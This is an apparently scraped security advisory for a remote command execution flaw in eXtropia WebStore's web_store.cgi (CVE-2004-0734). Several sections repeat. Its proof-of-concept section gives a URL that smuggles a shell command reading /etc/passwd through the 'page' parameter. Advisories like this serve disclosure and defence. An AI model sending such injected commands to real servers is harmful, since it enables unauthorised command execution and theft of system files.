Extropia WebStore Remote Command Execution Vulnerability
BID:10744
Info
Extropia WebStore Remote Command Execution Vulnerability
| Bugtraq ID: | 10744 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0734 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 17 2004 12:00AM |
| Updated: | Jul 12 2009 06:16AM |
| Credit: | Discovery is credited to Zero_X www.lobnan.de Team <[email protected]>. |
| Vulnerable: |
Extropia WebStore 2.0 Extropia WebStore 1.0 |
| Not Vulnerable: | |
Discussion
Extropia WebStore Remote Command Execution Vulnerability
eXtropia WebStore is prone to a remote command execution vulnerability.
This issue is due to insufficient input validation and may permit execution of commands in the context of the hosting Web server.
eXtropia WebStore is prone to a remote command execution vulnerability.
This issue is due to insufficient input validation and may permit execution of commands in the context of the hosting Web server.
Exploit / POC
Extropia WebStore Remote Command Execution Vulnerability
The following example was provided:
http://www.example.com/cgi-bin/web_store.cgi?page=.html|cat /etc/passwd|
The following exploit is available:
The following example was provided:
http://www.example.com/cgi-bin/web_store.cgi?page=.html|cat /etc/passwd|
The following exploit is available:
Solution / Fix
Extropia WebStore Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Extropia WebStore Remote Command Execution Vulnerability
References:
References:
- WebStore Product Homepage (Extropia)
- Web_Store.cgi allows Command Execution (Zero_X www.lobnan.de Team
)